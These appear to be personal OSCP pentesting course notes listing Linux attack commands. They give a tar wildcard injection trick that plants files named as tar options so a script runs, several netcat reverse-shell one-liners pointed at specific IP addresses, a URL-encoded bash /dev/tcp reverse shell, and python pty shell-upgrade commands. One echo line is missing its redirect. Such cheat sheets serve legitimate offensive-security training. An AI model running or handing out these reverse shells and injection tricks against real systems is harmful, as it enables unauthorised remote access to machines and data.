The following is notes from my pentesting course for OSCP
If there is a app using tar * you can do the following
echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.218.104 4444 >/tmp/f” shell.sh
touch “/var/www/html/–checkpoint-action=exec=sh shell.sh”
touch “/var/www/html/–checkpoint=1”
Clean Shell using Phone on Linux
python -c ‘import pty; pty.spawn(“/bin/bash”)’
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
# Simple shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.35 443 >/tmp/f
# Bash Reverse Shell
bash+-c+’bash+-i+>%26+/dev/tcp/10.10.14.14/443+0>%261’%26host=
More of a read
https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/